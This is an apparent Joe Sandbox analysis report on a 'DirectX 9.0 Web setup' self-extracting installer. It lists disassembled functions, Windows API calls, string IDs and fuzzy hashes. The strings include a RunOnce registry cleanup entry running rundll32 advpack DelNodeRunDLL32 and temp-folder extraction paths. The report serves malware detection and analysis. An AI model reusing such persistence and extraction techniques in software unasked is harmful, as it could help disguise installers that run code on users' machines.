                                                                                                • CharUpperA.USER32(?), ref: 0100332C
                                                                                                • CharUpperA.USER32(-0000004E), ref: 01003390
                                                                                                • lstrlenA.KERNEL32(0000002F), ref: 010033F4
                                                                                                • CharUpperA.USER32(?,0000002F,00000000), ref: 0100341F
                                                                                                • lstrcpyA.KERNEL32(0100B89A,0000002F), ref: 01003445
                                                                                                • lstrlenA.KERNEL32(0000002F), ref: 010034A7
                                                                                                • lstrcpyA.KERNEL32(0100BAA2,0000002F,0000002F,00000000,0000002F,0000005D,0000002F,0000005B), ref: 01003510
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 01003527
                                                                                                • ExitProcess.KERNEL32 ref: 0100352F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Upper$lstrcpylstrlen$CloseExitFileHandleModuleNameNextProcesslstrcmpi
                                                                                                • String ID: "$-$:$DirectX 9.0 Web setup$RegServer
                                                                                                • API String ID: 497476604-3032641433
                                                                                                • Opcode ID: 371de19490df7cb82253388f7ccfcefcc3d42cf60ba8daf27433a3a64da543f6
                                                                                                • Instruction ID: dd2cde4f62ecb0696e2bc8a39cc73c6255fd3d926b1c092d9355c5c2792a8576
                                                                                                • Opcode Fuzzy Hash: 371de19490df7cb82253388f7ccfcefcc3d42cf60ba8daf27433a3a64da543f6
                                                                                                • Instruction Fuzzy Hash: 74C1E075908694AEFB738B2C88493FA7FE4BB12341F4840D6E6C19E1D5CBB88685CB51
                                                                                                Function 010038CC Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 138stringmemorywindowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 01002AA6: LoadStringA.USER32(?,00000200,?,LoadString() Error. Could not load string resource.), ref: 01002AC1
                                                                                                • MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                • lstrlenA.KERNEL32(0000007F,?,?,00000200,00000001,DirectX 9.0 Web setup), ref: 01003963
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0100396A
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 01003975
                                                                                                • LocalAlloc.KERNEL32(00000040,00000064), ref: 0100397E
                                                                                                • wsprintfA.USER32 ref: 01003998
                                                                                                • lstrlenA.KERNEL32(00000000,?,?,00000200,00000001,DirectX 9.0 Web setup), ref: 010039B2
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 010039BD
                                                                                                • LocalAlloc.KERNEL32(00000040,00000064), ref: 010039C6
                                                                                                • wsprintfA.USER32 ref: 010039E1
                                                                                                • lstrlenA.KERNEL32(00000000,?,?,00000200,00000001,DirectX 9.0 Web setup), ref: 010039F3
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 010039FD
                                                                                                • lstrcpyA.KERNEL32(00000000,00000000), ref: 01003A15
                                                                                                • MessageBeep.USER32(?), ref: 01003A1E
                                                                                                • MessageBoxA.USER32(00000000,00000000,DirectX 9.0 Web setup,00000000), ref: 01003A5E
                                                                                                • LocalFree.KERNEL32(00000000), ref: 01003A67
                                                                                                  • Part of subcall function 01005D22: GetVersionExA.KERNEL32(?), ref: 01005D57
                                                                                                  • Part of subcall function 01005D22: GetSystemMetrics.USER32(0000004A), ref: 01005D85
                                                                                                  • Part of subcall function 01005D22: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 01005DA4
                                                                                                  • Part of subcall function 01005D22: RegQueryValueExA.ADVAPI32(?,01001251,00000000,?,?,?,?), ref: 01005DC5
                                                                                                  • Part of subcall function 01005D22: RegCloseKey.ADVAPI32(?), ref: 01005DD0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrlen$Local$AllocMessage$wsprintf$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersionlstrcpy
                                                                                                • String ID: DirectX 9.0 Web setup$LoadString() Error. Could not load string resource.
                                                                                                • API String ID: 374963636-2857572701
                                                                                                • Opcode ID: 29eaf20adb8414ecd2b4ec2a36024fe3784d745325a63702e793e7b321412cb4
                                                                                                • Instruction ID: 9f594f166ace6732594a8fb8e6c25f38449a5eba683ea2e31a4322fc80030977
                                                                                                • Opcode Fuzzy Hash: 29eaf20adb8414ecd2b4ec2a36024fe3784d745325a63702e793e7b321412cb4
                                                                                                • Instruction Fuzzy Hash: A6416631500259AFFB63AB64DC49FEA3AA8FF04350F040551FDC1DA195DBB5CA94CBA0
                                                                                                Function 01004E56 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 183windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadStringA.USER32(000003E8,0100A640,00000200), ref: 01004EAF
                                                                                                • GetDesktopWindow.USER32 ref: 01005009
                                                                                                • SetWindowTextA.USER32(?,DirectX 9.0 Web setup), ref: 0100501F
                                                                                                • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 01005038
                                                                                                • GetDlgItem.USER32(?,00000836), ref: 01005051
                                                                                                • EnableWindow.USER32(00000000), ref: 01005058
                                                                                                • EndDialog.USER32(?,00000000), ref: 01005065
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DirectX 9.0 Web setup
                                                                                                • API String ID: 2418873061-318513791
                                                                                                • Opcode ID: 631fb0b2ebf77da2618df05cbc4a49d4bbcce4c3538e6841af407c24bcd3fbff
                                                                                                • Instruction ID: 5d03767cd6d44e1ff7b95dfa45677d46a9542d139ef34e3ffbaad0eb8858980f
                                                                                                • Opcode Fuzzy Hash: 631fb0b2ebf77da2618df05cbc4a49d4bbcce4c3538e6841af407c24bcd3fbff
                                                                                                • Instruction Fuzzy Hash: EF519070241745BAF6735B668C4CFAF2EACEB86B45F004018B7C5EA0C5DAB9C611C7B8
                                                                                                Function 01005075 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 126threadwindowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • TerminateThread.KERNEL32(00000000), ref: 010050B2
                                                                                                • EndDialog.USER32(?,?), ref: 010050BE
                                                                                                • ResetEvent.KERNEL32 ref: 010050DF
                                                                                                • SetEvent.KERNEL32(000004B2,01001251,00000000,00000020,00000004), ref: 0100510F
                                                                                                • GetDesktopWindow.USER32 ref: 01005146
                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 01005176
                                                                                                • SendMessageA.USER32(00000000,?,?,00000000), ref: 0100517F
                                                                                                • GetDlgItem.USER32(?,0000083B), ref: 01005191
                                                                                                • SendMessageA.USER32(00000000,?,?,00000000), ref: 01005194
                                                                                                • SetWindowTextA.USER32(?,DirectX 9.0 Web setup), ref: 010051A2
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000049DB,00000000,00000000,0100AA48), ref: 010051B6
                                                                                                • EndDialog.USER32(?,00000000), ref: 010051D7
                                                                                                • EndDialog.USER32(?,00000000), ref: 010051FC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Dialog$EventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 2636921890-3102400635
                                                                                                • Opcode ID: 2e5909da755b8dd92093ec91b293cd0599467003ecf1b2f192f568b12a924e3b
                                                                                                • Instruction ID: 23f09e72cf5f3eaed0e006cdafc8c359d8237540093a3079cf3abfc6ea3c4f62
                                                                                                • Opcode Fuzzy Hash: 2e5909da755b8dd92093ec91b293cd0599467003ecf1b2f192f568b12a924e3b
                                                                                                • Instruction Fuzzy Hash: 0A415F31641225FBFB331B689C49EAA3EA8EB46B50F004011F6C5A64D9C77A9951CFD4
                                                                                                Function 010046D4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 109libraryloaderstringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,0100A640,0100A338,?), ref: 010046E2
                                                                                                • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 01004703
                                                                                                • GetProcAddress.KERNEL32(00000000,000000C3), ref: 01004716
                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 01004729
                                                                                                • GetTempPathA.KERNEL32(00000104,0100AA80), ref: 01004749
                                                                                                • lstrlenA.KERNEL32(0100AA80), ref: 01004750
                                                                                                • CharPrevA.USER32(0100AA80,00000000), ref: 01004760
                                                                                                • CharPrevA.USER32(0100AA80,00000000), ref: 0100476C
                                                                                                • lstrcpyA.KERNEL32(?,0100AA80), ref: 010047BD
                                                                                                • FreeLibrary.KERNEL32(?), ref: 010047CC
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 010047DC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemplstrcpylstrlen
                                                                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                • API String ID: 2439948570-1731843650
                                                                                                • Opcode ID: 3324b512f0aa79aaecc928bbb591f72aff6d5178d9e94c9ee451a4be34d2a9a1
                                                                                                • Instruction ID: 193eb6bc1a1b02d365b45401d2cfe27bf2cb542b23eb453a0d77d81c3b9a3dce
                                                                                                • Opcode Fuzzy Hash: 3324b512f0aa79aaecc928bbb591f72aff6d5178d9e94c9ee451a4be34d2a9a1
                                                                                                • Instruction Fuzzy Hash: 3F315EB1A01258BFEB139F69CC88DAE7FB8BF0A340F554069F688E6180C7758945CB65
                                                                                                Function 01002081 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101registrystringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CharUpperA.USER32(?,00000001,?,00000000), ref: 010020A8
                                                                                                • CharNextA.USER32(?), ref: 010020B7
                                                                                                • CharNextA.USER32(00000000), ref: 010020BA
                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,00000000), ref: 01002110
                                                                                                • RegQueryValueExA.ADVAPI32(?,01001251,00000000,?,?,?), ref: 01002133
                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 0100214E
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 01002162
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 01002176
                                                                                                • lstrcpyA.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010020EA
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • GetWindowsDirectoryA.KERNEL32(?,?), ref: 01002184
                                                                                                • GetSystemDirectoryA.KERNEL32(?,?), ref: 01002198
                                                                                                Strings
                                                                                                • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 010020D6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$lstrcpy$DirectoryNext$CloseEnvironmentExpandOpenPrevQueryStringsSystemUpperValueWindowslstrlen
                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                • API String ID: 347548745-2428544900
                                                                                                • Opcode ID: a6771fd5372bea0d88a9c6ef6506abc8c0f7b881c05286ce2042d5bdc15aa5be
                                                                                                • Instruction ID: d6a3e7514927295ec277a6c60e19e56b03ab3a9e12423da05e88d21a123d547c
                                                                                                • Opcode Fuzzy Hash: a6771fd5372bea0d88a9c6ef6506abc8c0f7b881c05286ce2042d5bdc15aa5be
                                                                                                • Instruction Fuzzy Hash: E0314A79900248BFEF228F64CC48FEE7BBDAF15350F008095FA84A6090D7B5DA958F90
                                                                                                Function 01001B8B Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 75registrystringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000000), ref: 01001BB7
                                                                                                • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,00000000,7591F530), ref: 01001BE3
                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 01001C12
                                                                                                • wsprintfA.USER32 ref: 01001C46
                                                                                                • lstrlenA.KERNEL32(?), ref: 01001C56
                                                                                                • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,00000001), ref: 01001C6C
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 01001C75
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Valuelstrlen$CharCloseDirectoryOpenPrevQuerySystemlstrcpywsprintf
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                • API String ID: 11565330-2874043782
                                                                                                • Opcode ID: 5599e54c7d9c30600de5d0d1969bc1e94db08515ae13c163f555adafc5244e2b
                                                                                                • Instruction ID: 2fb7fcdbff80cae6b570ff950ba8ccadd0e573114065fe0f363dccfd66d38777
                                                                                                • Opcode Fuzzy Hash: 5599e54c7d9c30600de5d0d1969bc1e94db08515ae13c163f555adafc5244e2b
                                                                                                • Instruction Fuzzy Hash: 25215375A4021CBBEB22DBA5DD49FDABB7CEB08740F0000A5F689E6081D7B5DB448F60
                                                                                                Function 01003566 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 76stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 0100358A
                                                                                                • FindResourceA.KERNEL32(00000000,?,0000000A), ref: 01003596
                                                                                                • LoadResource.KERNEL32(00000000,00000000,00000000,?,?,?,?,01005A22,00000000,01005ACB,?,?,01005ACB), ref: 010035AB
                                                                                                • LockResource.KERNEL32(00000000,?,?,?,?,01005A22,00000000,01005ACB,?,?,01005ACB), ref: 010035B2
                                                                                                • lstrlenA.KERNEL32(00000008,?,?,?,?,01005A22,00000000,01005ACB,?,?,01005ACB), ref: 010035CD
                                                                                                • FreeResource.KERNEL32(00000000,?,?,?,?,01005A22,00000000,01005ACB,?,?,01005ACB), ref: 010035E7
                                                                                                • wsprintfA.USER32 ref: 010035FC
                                                                                                • FindResourceA.KERNEL32(00000000,?,0000000A), ref: 01003609
                                                                                                • FreeResource.KERNEL32(00000000,?,?,?,?,01005A22,00000000,01005ACB,?,?,01005ACB), ref: 01003628
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$FindFreewsprintf$LoadLocklstrlen
                                                                                                • String ID: UPDFILE%lu
                                                                                                • API String ID: 3821519360-2329316264
                                                                                                • Opcode ID: cefe3b29808c0de11ca19ee608c6f983850b7a9791d33d4cc506cee2b882d878
                                                                                                • Instruction ID: 67bd43b507032c87e08e44f5702343a162528d16cb23afe419e5d1f44a4bfc8c
                                                                                                • Opcode Fuzzy Hash: cefe3b29808c0de11ca19ee608c6f983850b7a9791d33d4cc506cee2b882d878
                                                                                                • Instruction Fuzzy Hash: C8215171A00209AFDB12DFD5DC88AEEBBF8FB48701F108055F585E6144D776D6008B61
                                                                                                Function 010021FB Relevance: 16.6, APIs: 11, Instructions: 90stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000104,00000104,00000000,759183C0), ref: 01002235
                                                                                                • IsDBCSLeadByte.KERNEL32(00000000,?,7591E800), ref: 01002256
                                                                                                • CharNextA.USER32(?,?,7591E800), ref: 01002270
                                                                                                • CharUpperA.USER32(00000000,?,7591E800), ref: 01002278
                                                                                                • lstrlenA.KERNEL32(?,?,?,7591E800), ref: 01002291
                                                                                                • CharPrevA.USER32(?,?,?,7591E800), ref: 0100229D
                                                                                                • CharUpperA.USER32(00000000,?,7591E800), ref: 010022B5
                                                                                                • lstrcpyA.KERNEL32(?,?,?,7591E800), ref: 010022C5
                                                                                                • lstrlenA.KERNEL32(?,?,7591E800), ref: 010022D0
                                                                                                • CharNextA.USER32(?,?,7591E800), ref: 010022DC
                                                                                                • CharNextA.USER32(?,?,7591E800), ref: 010022E1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Next$Upperlstrlen$ByteFileLeadModuleNamePrevlstrcpy
                                                                                                • String ID:
                                                                                                • API String ID: 2740425872-0
                                                                                                • Opcode ID: 6f55dd0f941396175fb476c6ce2b428a4e45a6200b6cc63fadfff151ab2f4b34
                                                                                                • Instruction ID: c065ed5666d739eb8cb46574119231d274ae865d8c51cf87fce0dafe64722b0d
                                                                                                • Opcode Fuzzy Hash: 6f55dd0f941396175fb476c6ce2b428a4e45a6200b6cc63fadfff151ab2f4b34
                                                                                                • Instruction Fuzzy Hash: B631B1714083816FE773DFB88848BAABBEC6F4A700F58489AE5D0D3182D779D445CB66
                                                                                                Function 01003773 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EndDialog.USER32(?,00000000), ref: 010037A8
                                                                                                • GetDesktopWindow.USER32 ref: 010037B8
                                                                                                • SetDlgItemTextA.USER32(?,00000834,?), ref: 010037D5
                                                                                                • SetWindowTextA.USER32(?,DirectX 9.0 Web setup), ref: 010037E1
                                                                                                • SetForegroundWindow.USER32(?), ref: 010037E8
                                                                                                • GetDlgItem.USER32(?,00000834), ref: 010037F5
                                                                                                • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 01003822
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemWindow$Text$DesktopDialogForegroundMessageSend
                                                                                                • String ID: DirectX 9.0 Web setup
                                                                                                • API String ID: 3995847246-3102400635
                                                                                                • Opcode ID: 0416d64abb4ccf835619947f66294db8555aab5d7019f45f1413da29fbb76d96
                                                                                                • Instruction ID: 01c3b69a9c1d9b51098dd75da9e10fd26e27e0a568cfd527d8e7b98c3a4c5e06
                                                                                                • Opcode Fuzzy Hash: 0416d64abb4ccf835619947f66294db8555aab5d7019f45f1413da29fbb76d96
                                                                                                • Instruction Fuzzy Hash: DB116A35144305AFFB735F68DC4CBAA3AA4FB4AB61F000165F5D9991C4C7BA8281D791
                                                                                                Function 010015F6 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 58librarymemoryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,00000000,?,?,010016C1,?,00000000,?,01004E0E,?,?,00000000), ref: 0100161A
                                                                                                • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0100162E
                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,DirectX 9.0 Web setup,?,?,010016C1), ref: 0100165E
                                                                                                • FreeSid.ADVAPI32(00000000,?,?,010016C1), ref: 01001672
                                                                                                • FreeLibrary.KERNEL32(010016C1,?,?,010016C1,?,00000000,?,01004E0E,?,?,00000000), ref: 0100167C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                • String ID: CheckTokenMembership$DirectX 9.0 Web setup$advapi32.dll
                                                                                                • API String ID: 4204503880-3291049768
                                                                                                • Opcode ID: 05aef74ab9c6aad8ac387d91b692b6fb9c51c55194fb5577f0a734ca75a63f4d
                                                                                                • Instruction ID: 7c54915b23e232019903c0576df7497f5bb26148f144bc74401e3466b5a6cae1
                                                                                                • Opcode Fuzzy Hash: 05aef74ab9c6aad8ac387d91b692b6fb9c51c55194fb5577f0a734ca75a63f4d
                                                                                                • Instruction Fuzzy Hash: 87117071944289FBDB12DFA99C48ADEBFB8EF18344F540099F181A3181C6758A04CB65
                                                                                                Function 01002EAF Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filestringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetFileAttributesA.KERNEL32(00771048,00000080,?,?,00000000), ref: 01002EE4
                                                                                                • DeleteFileA.KERNEL32(00771048,?,?,00000000), ref: 01002EEC
                                                                                                • LocalFree.KERNEL32(00771048,?,?,00000000), ref: 01002EF7
                                                                                                • LocalFree.KERNEL32(00771048,?,?,00000000), ref: 01002EFA
                                                                                                • lstrcpyA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 01002F25
                                                                                                • SetCurrentDirectoryA.KERNEL32(01001284,?,00000000), ref: 01002F43
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 01002F1B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileFreeLocal$AttributesCurrentDeleteDirectorylstrcpy
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                • API String ID: 2574644873-1193786559
                                                                                                • Opcode ID: 93e692ac1587df938e33032a71ea2a0dccc3e90e8b89d3b20b57e192b1dc1fa6
                                                                                                • Instruction ID: 960ce29c7a69c0d0d6bd76a451a08647df6ffba3f75ce7ea97df57adcc28d351
                                                                                                • Opcode Fuzzy Hash: 93e692ac1587df938e33032a71ea2a0dccc3e90e8b89d3b20b57e192b1dc1fa6
                                                                                                • Instruction Fuzzy Hash: DB11E27A500259DFFB73EF58E94C96577E8FB04340F45406EE2C052198CBBB9548CB50
                                                                                                Function 01002A34 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
